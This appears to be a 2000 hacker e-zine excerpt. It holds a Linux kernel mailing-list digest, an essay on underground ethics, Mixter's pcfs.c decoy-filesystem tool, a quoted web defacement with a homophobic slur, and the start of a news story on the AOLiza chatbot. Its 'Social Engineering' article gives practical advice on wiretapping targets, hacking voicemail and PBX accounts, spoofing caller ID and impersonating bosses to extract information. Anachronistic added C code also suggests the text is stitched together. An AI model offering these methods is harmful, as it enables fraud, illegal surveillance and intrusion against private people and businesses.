           what I say out-of-hand, and continue as an experiment, or you can listen and make a significant contribution to providing jobs worldwide. 
      
           It is, of course, possible to fragment Linux. A company could be started, called StableLinux that distributes only Linux n.n.n and performs bug-fixes and maintenance on that version only. This is not helpful to the greater Linux community. Instead, we need to
           minimize the changes that affect the interfaces to world-wide applications. Just as POSIX attempted to stabilize the API so that one could write "portable" code, the interface to hardware that hasn't even been invented yet has to be stable. 
      
      Chris Adams and Horst von Brand suggested that "current distribution" referred to even-numbered minor version numbers only. Horst expanded, "OK, "current distribution" means 2.2.x kernel today, and was 2.0 sometime back. It will be 2.4 in a few months time, and
      perhaps 2.6 in a year and a half. You are supposed to distribute the machine and source to drivers &c _when shipped_, I'd assume. Check the code, test it to breaking *and keep it*. Ship that to customers, and either offer upgrades to 2.4 if needed for some reason, or
      stay put." 
      
      Elsewhere, replying to Richard's original post, Jamie Lokier said, "If you need a stable API, you chose the wrong operating system. It's no secret that Linux APIs change. You can't blame the kernel developers for doing exactly what they said they will do. If you want,
      you can blame the people who incorrectly assumed the APIs would stay the same, for not investigating the obvious." And Ted added, "If you told your management that Linux kernel interfaces never change across versions, then you were sadly mistaken. However,
      the mistake is on your end, I'm afraid." 
      
      To this, Richard replied: 
      
           No. According to our Legal Department, to satisfy the GPL requirement that we provide source to the end-user, they required that we supply a "current" distribution of Linux if the end-user requests it. 
      
           This seemed, by them, to be an easy solution to possible problems. Unfortunately, for Engineering, this means that we have to keep everything "current" during development so that, by the time equipment is shipped, it will run with the "current" distribution
           (whatever this is). 
      
           The obvious solution, given these constraints, is that we just ignore all changes until shipping time, then attempt to compile with the latest distribution, fixing all the problems at once. However, we then end up shipping untested software which ends up being
           another problem. Checking to see if it "runs" isn't testing software in the cold cruel world of industry. 
      
           So, presently, I have 13 drivers I have to keep "current". Yesterday they all got broken again. A week before, half of them were broken because somebody didn't like a variable name! 
      
           That said, a major problem with changes that I see, is that the changes are made without the notion of a terminating condition. For instance, new parameters are being passed to existing interface functions. 
      
           If you are going to break an interface, you should plan on only breaking it once rather than opening the door for more changes and leaving it open. For instance, once you have to pass more than (depends upon the machine) about 3 parameters, it's best to put
           them all in a parameter-list (structure) and pass only the address of the parameter list (pointer). 
      
           From that time on, you only have to add structure members to the parameter list if you have to add changes. If I had seen these kinds of changes I would not have complained. It means I have to rework stuff only once. 
      
           So `read(f,.......)` should have been changed to `read(params *)` and you are done with it forever as long as you don't change structure member names and functions for kicks. 
      
      This time it was Alexander's turn to pick himself up off the floor; and in response to the first paragraph of Richard's post, said, "Oh. My. God. They are requiring you to do WHAT??? Do you mean that you really ship 2.3.x to your customers? Arrggh. "Source" ==
      "source of what we are shipping". And not "anything that was written by other guys who started from the same source". It's utter nonsense. _No_ license can oblige you to include the modifications done by somebody else. Otherwise you'd have those drivers in the
      main tree, BTW - _that_ much should be clear even for your LD." But David Lang put in, "he is not saying that he has to ship a 2.3 kernel, he is reacting to the fact that he will have to ship a 2.4 kernel. The blame for this lies squarely on the legal department who
      decided that they had to ship a "current" distro. There is some semblance of reason for this as they want to try and limit the support costs by not using "obsolete" versions, but given the way many of the major distros patch the kernel before shipping it you still may have
      problems. The answer is to figure out some way to educate the legal department to allow for a more gradual change." 
      
      
      #fundamental
      
      Taken from http://kt.linuxcare.com/latest.epl on 2/3/2000, this is just one example of serious design problems with Linux, and serious questions about its present and future direction, considering the plans laid out by its creator. Apparently speed and efficiency aren't as
      important to Linus as having a pretty filesystemish interface. Hope you didn't want to do anything useful with your CPU in userspace... 
      
      /proc And sysctl()
      
      2000/01/06 - 2000/01/12 (43 posts): /proc guidelines and sysctl 
      
      Benjamin Reed wrote a wireless ethernet driver that used /proc as its interface. But he was a little uncomfortable defining his own namespace under /proc, and asked if there were any conventions he should follow. He added, "And finally, what's up with sysctl? Are
      driver writers recommended to use that over extending /proc or is it deprecated? Again guidelines would be nice." 
      
      Linus replied with: 
      
           The thing to do is to create a 
      
                /proc/drivers/<drivername>/ 
      
           directory. The /proc/drivers/ directory is already there, so you'd basically do something like 
      
                create_proc_info_entry("driver/mydriver/status", 0, NULL, mydriver_status_read); 
      
           to create a "status" file (etc etc). 
      
      For the sysctl question, he added, "sysctl is deprecated. It's useful in one way only: it has some nice functions that can be used to add a block of /proc names. However, it has other downsides (allocating silly numbers etc - there should be no need for that, considering
      that the /proc namespace is already a perfectly good namespace)." 
      
      Marcin Dalecki flamed Linus: 
      
           Are you just blind to the neverending format/compatibility/parsing/performance problems the whole idea behind /proc induces inherently? Oh yes they don't turn up that frequently any longer, since everybody learned in the time between don't touching anything
           there like a heap of shit. Instead of changing something, one leaves the broken /proc interface where it is and adds just another new file (or even dir) there. 
      
           My favorite examples for how broken they are 
      
                 /proc/stat 
                            the information there is entirely *broken* misleading and incomplete. (leftover from early days.)
                 /proc/pci 
                            static data continuously reconstructed on the fly. (binary to string and then back string to binary in userland...) And now (2.3.xx) it's even binary only...
                 /proc/cpuinfo 
                            same here static data. uname is since the beginning the proper interface for this stuff.
                 /proc/ksyms 
                            entirely redundant and not used by the modutils.
                 /proc/modules 
                            entirely redundant to the module syscalls. *Not* used by lsmod.
                 /proc/version 
                            entirely static data with no apparent value
                 /proc/kmsg 
                            entirely redundant to syslog.
      
      
           One could continue with no end... 
      
                root:/proc# cat meminfo
                total: used: free: shared: buffers: cached:
                Mem: 64577536 62787584 1789952 20643840 1339392 17186816
                Swap: 139821056 36478976 103342080
                MemTotal: 63064 kB
                MemFree: 1748 kB
                MemShared: 20160 kB
                Buffers: 1308 kB
                Cached: 16784 kB
                SwapTotal: 136544 kB
                SwapFree: 100920 kB 
      
           Wonderful!!!! The same data twice, albeit no one of them easily parsed! Easily parsed? By what? AWK? SED? or should the procps utilities being implemented in damn PERL? (Some losers who don't know C would appreciate this, certainly) !!!!! The only
           thing I'm missing is adding floating point formats to this... 
      
           And then there is the phenomenon of proliferation of /proc items. Just an example... 
      
                root:/proc/ide# find /proc/ide
                /proc/ide
                /proc/ide/drivers
                /proc/ide/hdd
                /proc/ide/ide1
                /proc/ide/ide1/hdd
                /proc/ide/ide1/hdd/capacity
                /proc/ide/ide1/hdd/settings
                /proc/ide/ide1/hdd/model
                /proc/ide/ide1/hdd/media
                /proc/ide/ide1/hdd/identify
                /proc/ide/ide1/hdd/driver
                /proc/ide/ide1/model
                /proc/ide/ide1/mate
                /proc/ide/ide1/config
                /proc/ide/ide1/channel
                /proc/ide/hda
                /proc/ide/ide0
                /proc/ide/ide0/hda
                /proc/ide/ide0/hda/smart_thresholds
                /proc/ide/ide0/hda/smart_values
                /proc/ide/ide0/hda/geometry
                /proc/ide/ide0/hda/cache
                /proc/ide/ide0/hda/capacity
                /proc/ide/ide0/hda/settings
                /proc/ide/ide0/hda/model
                /proc/ide/ide0/hda/media
                /proc/ide/ide0/hda/identify
                /proc/ide/ide0/hda/driver
                /proc/ide/ide0/model
                /proc/ide/ide0/mate
                /proc/ide/ide0/config
                /proc/ide/ide0/channel 
      
           Hell only God knows what they are good for! And there is no userland tool for this. This is the last thing Mark Lord added before ditching ide development. 
      
                root:/proc/sys# find /proc/sys | wc
                208 208 7305 
      
           Don't tell me any sane admin will fiddle with ALL this... And in esp. any sane system doesn't need this degree of pseudo configuration flexibility. 
      
           And here my ABSOLUTE FAVORITE: 
      
                  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
                21821 root      19   0  1032 1032   816 R       0  4.7  1.6   0:00 top
                                                                    *
                                                                   ***
                                                                  *****
                                                                 *******
                                                                *********
                                                                   ***
                                                                   ***
                                                                   ***
                                                                   ***
                                                                   ***
                                                                   ***
      
           Yes reading files, walking dirtrees and parsing them is indeed very very time consuming. I would like to know how well this design will scale to an enterprise server with 32 CPU and X*10000 concurrent processes: 
      
                user:~/mysweethome: Message from root@localhost to user@localhost resived... BLAH BLAH: "Please stop any intensive intermittient computational activity. Due to maintainance work I'm going to run ps auxw int 5 minutes. Thank's in advance
                for your understanding! 
      
                You's sincerly: 
      
                root@localhost" 
      
           Oh don't tell me procps could have been done better, there were years of time for this and apparently nobody managed to get it right for practical reasons.. 
      
           I think you don't write enough user-land code... (just a guess) go and just compare for example the ps/netstat utilities from *BSD just to see WHY /proc as it is, is a BAD design :-). 
      
           Maybe it appears cute as an idea to have something like this, but in practice something like this is inevitably going to result in a coding mess in esp. in such an uncoordinated effort like Linux. 
      
           And I didn't even tell a word about the bloat/mess/races inside the kernel code caused by this all... 
      
           Really man sysctl *is* much much saner and what should be "deprecated" is /proc 
      
      There was a bit of discussion, but Linus did not reply. 
      
      Alexander Viro replied to Linus' statement that sysctl was deprecated. He burst out with: 
      
           Oh, please! All we need is sysctlbyname(2) - _not_ a problem, and closes all problems with numbers. And it should not work through mounted procfs - we can traverse the tree doing comparisons by name just fine. The fact that sysctl(8) needs mounted procfs
           is an artificial misfeature, nothing more. 
      
           What _is_ bogus is the idea of sysctl() doing more than read/write access to constant-sized variables. Or procfs entries doing ioctl(), for that matter - just look at /proc/mtrr, for one specimen. 
      
           sysctl() is a perfectly reasonable subset of pseudofs-type stuff, with well-defined semantics (unlike the rest ;-/). The rest is pretty much a maze of twisted little formats, none alike. IMO dissolving the thing is _not_ a good idea. You have the final word, indeed,
           but I think that sysctlbyname() may remove most of the problems. 
      
      Linus replied that he'd accept a patch to turn sysctl into a proc-only thing. He added, "The current problem is that sysctl tries to be more than proc, and has its own name-space etc. Not worth it." Andi Kleen proposed, "The nice thing of giving up the sysctl numbers is
      that it would be possible to use some ELF section based scheme for declaring sysctl variables in nice wrapper macros. You could get a sysctl variable with a single declaration. This would make them a lot more easy. Would you accept a patch for that?" Linus replied,
      "Show me the patch, and I can consider it. It would certainly be nicer than what it is now (the include/linux/sysctl.h file is EVIL, and a perfect example of the kind of idiotic brokenness we used to have in /proc before it was cleaned up)." 
      
      Theodore Y. Ts'o also replied to Alexander, saying, "I actually like the original sysctl() design --- including the use of reserved numbers. After all, we have system calls, and we don't try to look up system calls when we executed them by name..... why is this OK for
      system calls, but not OK for sysctl()?" Linus replied: 
      
           Because system calls are performance-sensitive. 
      
           And system calls are not clearly "hierarchical". 
      
           And system calls are supposed to be there regardless of what software and hardware configuration we have there. 
      
           In contrast, sysctl isn't all that performance-sensitive, AND they are extremely hierarchical, AND they depend on configuration and timing. 
      
           In short, sysctl NEEDS: 
      
                "naming": you cannot name the sysctl space with a number: it is much too dynamic for that. How do you enumerate drivers? Give them random numbers? 
                "listing": showing which sysctl's are there, in a hierarchical manner. Again, a listing is useless with a number. 
                "hierarchy". You have different devices, but they have the same controls. Do they get the same name? Yes. But in different places in the hierarchy. 
      
           In short, you NEED a filesystem. You need to be able to "ls" the thing. You need to be able to search the thing. You need to be doing all the things you can do with a real filesystem. 
      
           And flattening it out and trying to number it does not work. Never has, never will. It's not an enumerated space. 
                                                                                                                                                                         
      Sun Jul 30 04:40:22 EDT 2000
      linux/stupidity.src 
      Updated: Fri Jul 21 2000 1:13.15 
      Copyright  1998-1999 by Nick Johnson. All rights reserved. 
      
      
      
      @HWA      
      
313.0 [IND] Article submission on 'Social Engineering' by tekneke
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Social Engineering by Tekneke

      Introduction: The purpose of this text is to introduce or better 
      explain the art of social engineering. This is one of the most difficult 
      things to explain but I found a rather easy method of doing it until you 
      perfect your skills.

      Cross Analyzation: To begin social engineering you must know how to 
      cross-analyze someone. Cross Analyzation is basically determining 
      someone's personality by looking at them. This can be fairly easy because 
      people make the way they live so obvious to others. For example, how would 
      you determine someone as being a homeless drunk? Well by their clothes, 
      hygiene, smell, a bottle of alcohol in their hand, etc. Another way cross 
      analyzation can be used is over the phone but this method is not reliable 
      in some cases. But it is a very useful tool when social engineering. Look 
      for things such as their tone of voice, the way they answer the phone, 
      mumbling, stuttering, etc. You can also see how dumb someone is if you 
      tell them that they won a sweepstakes and you want to collect some 
      information about them and they don't hang up on you.

      Information Gathering: Information Gathering these days is very 
      easy. For example, if you wanted to find out the phone # of your next door 
      neighbor simply log onto the internet and go to portal.cyberarmy.com and 
      you just type in what you know whether it be the phone number, address, or 
      full name. Another method would be by snooping through their mail and 
      trash. The best method (in my opinion) is to run a tap on their line. This 
      way you can use what you heard to make a better cross-analyzation and you 
      might gain some valuable information such as usernames and passwords, 
      (which could doubtfully be obtained by social engineering or you wouldn't 
      be reading this) and maybe you'll even be able to get some dirt on them. 
      Another method would be to get the old binoculars and watch as they enter 
      passwords for e-mail on their computer or as they chat with people. 
      Another method I have used in the past is hacking their voice mail box 
      or answering machine. Now if you do all of this you will have a shit load 
      of information on them. Now to get to the engineering.

      Getting Prepared: Before calling your victim you might want to get 
      a caller id spoofer or go box someone else's line. Another useful tool is 
      a voice changer. Now if you do use a voice changer make it sound like you 
      are a woman because most men will listen and believe what women tell them 
      more than men. You might also want to see what kind of counter measures 
      they have by snooping around the building or office that is your target. 
      If it's just someone's house then you can assume that they have caller id 
      and some have anonymous call rejection. You might also want to route your 
      call through a pbx if you have access to one. That way if you call out of 
      area it's billed on them. Another tip would be to call your target up to 
      see what you have to say or do to get the information you want from a 
      person. For example, if you were trying to get an operator to tell you the 
      number you are dialing from you might want to imitate a telco guy and say 
      you are calling from a trunk (which might work). You might also wanna find 
      out about that person's boss so that you could imitate him/her. This is a 
      very good idea if you can imitate their tone of voice and their slang. And if 
      they give you some shit just give them shit back and say you're gonna fire 
      them!!!

      Social Engineering: Now it's time to put all that effort to work. 
      This should actually be the easiest part if you successfully completed the 
      other stuff. But if not you are gonna have to do some serious 
      bullshitting. You might wanna rehearse what you are gonna say as best as 
      you can but you must expect the unexpected. If the target is on a PBX then 
      hack into an account (such as the boss's) and call them from that. Or you 
      could box the boss's house if you know where he/she lives.

      This is only the first version of this text. I will be releasing 
      more tips and tricks of the trade. This may be a short text but it is a lot 
      more informative than the other ones out there. Anything to add or change? 
      Send it to tekneke@geeks404.com.

      


 314.0 [IBT] Ethics & The Underground, What the hell happened? - Gh0zt
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       By: Gh0zT 

       When I first came onto the scene in '95, I found the underground scene to be
       quite hospitable.  People I met were friendly, and if you said something out of
       place it was merely looked down upon.  Today things have made a drastic
       change for the worse; the scene has become a war zone if you will.  There are
       crackers, script kiddies, hackers, warez pups, groupies (a.k.a. scene whores)
       and just plain old idiots that I don't like to stereotype, but unfortunately that is
       the way it is.  Never have I seen such chaos in the scene, the long held
       traditions of ethics and netiquette have basically been forgotten or were never
       learned by the newer generation. 
 
       Many people have tried to explain why this has happened, but personally I
       think the blame falls on veteran hackers that have not lent a hand to up and
       coming newbies when they asked for help.  So, over time the newbies
       became script kiddies by learning to hack the easiest way they could--by
       simply running a script or program that someone else wrote.  And over time,
       after being rejected by legitimate hackers they developed a serious attitude. 
       The second part of the blame also falls on the media.  They have brought a
       sub-culture that was meant to be just that, a sub-culture, to the mainstream,
       and to the attention of the public. 
 
       Our ranks have swollen since high profile hacks started reaching the 10
       o'clock news and movies started having technical themes.  One movie I think
       we all can remember is "Hackers."  Even though the story line was totally
       false, it made thousands of eager kids join the scene with handles such as
       "Zero Cool" and "Lord Nikon."  Another very apparent reason for the swell in
       our ranks has been because of media interviews.  A lot of big name hackers
       who have gone commercial and now call themselves White Hat Hackers; in
       other words a hacker for hire.  I have nothing against these people because
       they are doing what they love and getting paid a lot of money for it.  However,
       sometimes they seem to forget that each of us at one time was a neophyte
       and NONE of us were born with a nix manual.  Sometimes they need to stop
       for a second and actually befriend someone who is having trouble. 
 
       That, in my humble opinion, is a part of the reason for the decline in ethics. 
       The other is a lack of role models.  Yes, some hackers such as the world
       renowned Cult of the Dead Cow have remained in touch with their peers but
       other groups have not and don't want anything to do with newbies.  The motto
       of these people is "Read the Fucking Manual."  I have news for all of those
       types of people:  the person you just blew off might have had experience in
       another area such as programming, or some other kind of knowledge that you
       yourself are lacking, but they just need that little boost to help them out a bit. 
       The worst part is you will never know and you might have hampered your own
       growth by blowing them off.
 
       Almost everyday I hear about web site defacements, the media describing
       ALL hackers as criminal, comparing us to common thugs, although this is not
       true.  One thing we all have to remember about people is this:  if they don't
       understand a culture they will be biased against it, that is true.  It is kind of
       the same when the general public thinks of a hacker as a nerdy white guy
       who is pale as paper and sits in a room all night trying to get their credit card
       numbers.
 
       No one thinks that anybody on the street could be a hacker.  I can remember
       once I had not gotten a hair cut nor had I shaved for four months.  This was
       due to a lack of time and laziness.  One day I met someone at work who was
       asking a question about computers.  I responded with the answer he needed
       and he looked at me strangely, as if he had seen a ghost.  It was
       incomprehensible to him that I possessed computer knowledge, and when I
       asked him, "Why the strange look?", he responded that he didn't think I even
       had a computer, much less how to turn one on.  There has been so much
       stereotyping that normal people just don't think that the person working next
       to them or even the garbage man could be a hacker, or even involved in the
       computer underground. The truth of the matter is, although a large majority is
       white, there are plenty of minorities actively involved in the scene. 
 
       If you're like me, then you are sick of hearing about kids nuking some
       sixty-year-old grandmother offline because she simply stated a religious
       viewpoint, or waking up and hearing about some 15 year old "hacker"
       because he cracked his school network and changed his grades.  Now is the
       time to start setting examples for both neophytes and
       script kiddies alike, because they are our future and without ethics the scene
       will become what the media is making it out to be. 
 
       Generally I always try to help people when I can.  If someone asks a question
       just try to have patience and help them out, even if it is a "how do I hack my
       girlfriend's hotmail account" type of question.  Do not simply tell them to go
       fuck themselves, just give them an appropriate answer and/or suggest a better
       course of action.  One major thing that is getting a lot of people in trouble is
       the fact that some of us do not know when to stop bragging and when to shut
       up.  If you didn't know, that is one of the biggest ways people in the scene get
       busted, by agents posing as fellow scene members.  When you are on a chat
       service, remember to treat people like you want to be treated, because it
       leaves a lasting impression on people.  So just think next time you go into a
       chat room.  Someone who you might meet later in life could be there, and you
       might turn him or her off to helping newbies.  If you see someone such as a
       "groupie" (a.k.a. scene whore), make sure you turn a kind cheek and
       remember not to get down with them, because it could lead to your downfall. 
       Scene whores make other women look bad, because if a female is
       legitimately trying to get in to the computer security scene, then they make it
       harder because their male counterparts don't respect them as much as other
       males. So, in other words, just treat females equally even if they are whores. 
 
       Those are my opinions, and they are just that, opinions.  I also hope that I
       made people think and form their own opinions.  That was what I was aiming
       for, but in truth I have to say, "Wake Up."  We are getting more and more
       restrictions slapped on us and we are just taking it.  There needs to be a
       unified underground to help each other out when we need it.  But like I said,
       this is only my opinion.
 
       I also must commend Carole Fennelly on her response to an article that was
      published on HNN about scene whores. 

      @HWA       

 315.0 [IND] PCFS.C by Mixter
       ~~~~~~~~~~~~~~~~~~~~~~
       
       This is totally cool, check it out, another gem from Mixter. - Ed
       
       home:http://mixter.void.ru
       email:mixter@newyorkoffice.com
       
       
       
      /*
       *            pcfs - pseudo cryptographic file system
       *                      (c) 2000 by Mixter
       *
       *  This tool just creates a recursive directory and file structure
       *  that contains purely random data, but is indistinguishable from an
       *  encrypted CFS directory, unless an extensive cryptanalysis is performed.
       *  This can be taken as a proof that a strange directory cannot easily be
       *  proven to actually contain encrypted data. May be useful against f3dz,
       *  just for decoy purposes, or to keep people from analyzing your
       *  cryptographic file systems structure. Distributed according to the GPL.
       *
       *  WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
       *  CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
       *  This code was reviewed and approved by the SCC (sloppy code commission)
       *  gcc -Wall -O2 pcfs.c -o pcfs
       */
      
      #include <stdio.h>
      #include <string.h>
      #include <sys/time.h>
      #include <sys/resource.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <stdlib.h>
      
      #define START_PATH      "fake"
      
      mode_t modes[7] =
      {00755, 00644, 0000, 00664, 00700, 00777, 00444};
      char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
      char wd[200];
      int rcounter = 0;
      void random_init (void);
      inline long gr (int, int);
      char *rname (void);
      mode_t rmode (void);
      void mkfiles (void);
      void mkd (char *, int);
      
      int
      main (void)
      {
        printf ("Creating fake file system in %s/%s, press a key\n",
                getcwd (wd, 200), START_PATH);
        (void) getchar ();
        printf ("Hit CTRL+C to stop - creating files");
        if (!geteuid ())
          setpriority (PRIO_PROCESS, 0, -10);
        mkd (START_PATH, 0);
        return 0;
      }
      
      void
      mkd (char *dirname, int forking)
      {
        printf (".");
        fflush (stdout);
      
        if (forking)
          if (fork ())
            return;
        mkdir (dirname, rmode ());
        /* relative chdir: no fixed-size path buffer to overflow on deep trees */
        chdir (dirname);
        if (forking)
          mkfiles ();
        else
          {
            char smbuf[32];
            int a, f = open ("/dev/urandom", O_RDONLY);
            read (f, smbuf, 32);
            a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* hash */
            write (a, smbuf, gr (5, 10));
            close (a);
            sprintf (smbuf, "%ld", gr (1, 5));
            a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* algorithm */
            write (a, smbuf, strlen(smbuf));
            close (a);
            read (f, smbuf, 32);
            a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* encrypted key */
            write (a, smbuf, 32);
            close (a);
            close (f);
            sprintf (smbuf, "%ld", gr (1000, 900000));
            a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* session blah */
            write (a, smbuf, strlen(smbuf));
            close (a);
            while (1)
              mkfiles ();
          }
      }
      
      void
      mkfiles (void)
      {
        while (gr (0, 25))
          if (!gr (0, 10))
            mkd (rname (), 1);
          else
            {
              int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
              char fname[256], fn2[256], big[65535];
              memset (fname, 0, 256);
              memset (fn2, 0, 256);
              sprintf (fname, "%s", rname ());
              sprintf (fn2, ".pvect_%s", rname ());
              symlink (fname, fn2);
              x = open (fname, O_RDWR | O_CREAT, rmode());
              read (f, big, y);
              write (x, big, y);
              close (f);
              close (x);
            }
      }
      
      char *
      rname (void)
      {
        int i;
        memset (buffer, 0, 256);
        for (i = 0; i < gr (5, 150); i++)
          buffer[i] = chr[gr (0, 15)];
        return buffer;
      }
      
      mode_t
      rmode (void)
      {
        return (modes[gr (0, 6)]);
      }
      
      void
      random_init (void)
      {
        int rfd = open ("/dev/urandom", O_RDONLY);
        if (rfd < 0)
          rfd = open ("/dev/random", O_RDONLY);
        rcounter = read (rfd, rseed, 65535);
        close (rfd);
      }
      
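      long
      gr (int min, int max)
      {
        /* refill the seed pool when fewer than two unused bytes remain */
        if (rcounter < 2)
          {
            random_init ();
            if (rcounter < 2)   /* no random device could be read */
              exit (1);
          }
        /* seed from the last two unused pool bytes; indexing below rcounter
           stays inside rseed[], and srandom() is the seeder for random() */
        srandom ((unsigned char) rseed[rcounter - 1]
                 + ((unsigned char) rseed[rcounter - 2] << 8));
        rcounter -= 2;
        return ((random () % (int) (((max) + 1) - (min))) + (min));
      }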
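
      The header comment's claim, seen from the forensic side, as an added example (not Mixter's code): a byte-histogram chi-square test of the kind used in disk triage gives real ciphertext and plain random filler the same verdict. RC4 with a constructed key stands in for a file-system cipher and a fixed-seed mixer stands in for /dev/urandom; both are assumptions made so the example runs offline.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SAMPLE_LEN 65536u
#define CHI_LIMIT  512.0   /* uniform bytes score about 255 +/- 23 */

static unsigned char plain[SAMPLE_LEN], cipher[SAMPLE_LEN], decoy[SAMPLE_LEN];

/* Chi-square of the byte histogram against a uniform distribution. */
static double chi_square(const unsigned char *buf, size_t len)
{
    unsigned long hist[256] = {0};
    double expected = (double)len / 256.0, chi = 0.0;
    size_t i;

    for (i = 0; i < len; i++)
        hist[buf[i]]++;
    for (i = 0; i < 256; i++) {
        double d = (double)hist[i] - expected;
        chi += d * d / expected;
    }
    return chi;
}

/* Triage verdict: 1 if the buffer is statistically flat (encrypted-looking). */
static int looks_random(const unsigned char *buf, size_t len)
{
    return chi_square(buf, len) < CHI_LIMIT;
}

/* RC4, used here only as a compact stand-in for a file-system cipher. */
static void rc4_crypt(const unsigned char *key, size_t keylen,
                      const unsigned char *in, unsigned char *out, size_t len)
{
    unsigned char S[256], t;
    unsigned i, j;
    size_t n;

    for (i = 0; i < 256; i++)
        S[i] = (unsigned char)i;
    for (i = 0, j = 0; i < 256; i++) {          /* key schedule */
        j = (j + S[i] + key[i % keylen]) & 0xff;
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    i = j = 0;
    for (n = 0; n < len; n++) {                 /* keystream XOR input */
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        t = S[i]; S[i] = S[j]; S[j] = t;
        out[n] = in[n] ^ S[(S[i] + S[j]) & 0xff];
    }
}

/* 64-bit mixer with a fixed seed: reproducible stand-in for /dev/urandom. */
static uint64_t mix64(uint64_t *state)
{
    uint64_t z = (*state += 0x9E3779B97F4A7C15ULL);
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

/* Build three constructed samples: text, its ciphertext, and random filler. */
static void build_samples(void)
{
    static const char line[] =
        "constructed sample: quarterly report draft, do not distribute\n";
    static const unsigned char key[] = "constructed-demo-key";
    uint64_t state = 0x0123456789ABCDEFULL, r = 0;
    size_t i, n = sizeof line - 1;

    for (i = 0; i < SAMPLE_LEN; i++)
        plain[i] = (unsigned char)line[i % n];
    rc4_crypt(key, sizeof key - 1, plain, cipher, SAMPLE_LEN);
    for (i = 0; i < SAMPLE_LEN; i++) {
        if (i % 8 == 0)
            r = mix64(&state);
        decoy[i] = (unsigned char)(r >> (8 * (i % 8)));
    }
}

int main(void)
{
    build_samples();
    printf("plaintext   chi2=%12.1f  random-looking=%d\n",
           chi_square(plain, SAMPLE_LEN), looks_random(plain, SAMPLE_LEN));
    printf("ciphertext  chi2=%12.1f  random-looking=%d\n",
           chi_square(cipher, SAMPLE_LEN), looks_random(cipher, SAMPLE_LEN));
    printf("decoy       chi2=%12.1f  random-looking=%d\n",
           chi_square(decoy, SAMPLE_LEN), looks_random(decoy, SAMPLE_LEN));
    return 0;
}
```

      Content statistics alone flag both buffers as high-entropy data; they cannot say which one holds recoverable plaintext.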
      
      @HWA       

 316.0 [IND] The hypocrisy runs rampant prizm mr anti-defacement himself defaces?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


        When I knew prizm he was VERY anti-web defacement, and anti-script kiddy, I'm 
        not sure if this was really done by him but it does fit his attitude and way of
        speaking...also b0f security has not existed for months now not to mention he quit
        several times and was VERY quiet last we spoke...

        Aug 10th 2000

        link:Attrition http://www.attrition.org/mirror/attrition/2000/08/10/www.mothermadetoys.com/

                                      
          /title/ sure, you can do it  //title/
          
          hacked by prizm of b0f security.

        I hacked this server to say that attrition.org are a bunch of
        hypocrit faggots for hosting their defacement archieve, yet they dont
        condone defacements.
        
           They say that script kiddies are stupid for running around  
        defacing all these random servers, yet, they host a defacement archive   
        that 90% of media organizations visit to keep tabs on hacks. What it seems
        like to me is that the attrition crew are nothing but a bunch of lame
        media whores that want to get their 15 minutes of fame in this huge media 
        surge from the media about hackers and hacking.
        
             Also, doesn't it seem kinda odd that some of the attrition crew
        are "security consultants" and host a defacement mirror?  What a better  
        way to cash in huh?  Host a defacement mirror, send e-mails out to the
        hacked machines and offer your services.  They say they dont, but they
        also said they werent HFG, but everyone knows they were. They ever missed
        a HFG hack did they? Nope.
        
        
        Attrition.org is nothing more than antionline.com with a
        defacement mirror. It's all about the media.  All those RDS kiddies
        running around rds'ing their way into any and everything they can find and
        hosting their hacks are a great way to get that media to come isn't
        it?  A great way to get work.
        
        
        I'm gonna send this to attrition.org to see if they will
        mirror something that talks shit about them.  The problably will edit this
        defacement like they do most of the others.  I guess we'll see. 
        
        
                                                                                          
        Additional: remnant members of b0f (some not all) including Slash the founder merged with 
        HWA Security, hence the news worthiness of this item.
                                   
       @HWA 
       
 317.0 [MM] Do you have an imaginary friend? no? are you sure?? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       By TrdOnjuan
              
       http://www.abcnews.go.com/sections/tech/DailyNews/aoliza000829.html       
       
                 Imaginary Friends
                 Electronic Chatter Fools Instant Messengers

                 [Photo caption: Some Instant Messengers have found
                 Eliza, a 33-year-old in Berkeley, Calif. They think she's
                 a relative, or they tell her painful stories about
                 ex-girlfriends. But actually Eliza's a computer program.
                 (aol.com)]

                 By Sascha Segan

                 Aug. 29 -- Do you really know the person with
                 whom you're chatting online? Do you really
                 know it is, in fact, a person?
                      AOL Instant Messenger, a one-on-one online chat
                 system, is a sea of conversations and failed attempts at
                 contact, where millions of people each day reach out to
                 talk to people they know -- or people they hope to
                 know.
                      Some find Eliza, a 33-year-old in Berkeley, Calif.
                 They think she's a relative, or they tell her painful stories
                 about ex-girlfriends.
                      The problem is, Eliza's a computer program -- one of
                 the simplest artificial intelligence programs around, and a
                 lot of the people talking to Berkeley student Kevin Fox's
                 unattended Powerbook G3 don't seem to notice (or
                 maybe care.)
                      They just want to connect with someone.
                      "Their minds are set to try and make sense of anything
                 -- to try to interpret anything as communication," Fox
                 said.
                      AOL isn't pleased that naive users are mistaking Eliza
                 for one of their own.
                      AIM is "diverse, it's hip and it's fun, which aren't the
                 words I'd use to describe a robot," said AOL spokesman
                 Nicholas Graham. "[Users] expect a real, live person to
                 be behind the screen name."

                 Enter AOLiza
                 Fox has chronicled 31 human-Eliza interactions on his
                 Web page, AOLiza, and he's adding more regularly. A
                 few of the correspondents seem to have figured out
